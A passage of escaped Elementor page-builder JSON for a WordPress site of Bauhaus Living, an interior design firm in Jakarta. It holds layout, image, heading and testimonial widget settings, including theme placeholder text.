emplate1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"WELCOME TO BAUHAUS\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Let\'s turn your ideas into reality\\\"<\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.<\\/p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.<\\/p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-5878-scaled.jpg\",\"id\":4796,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit 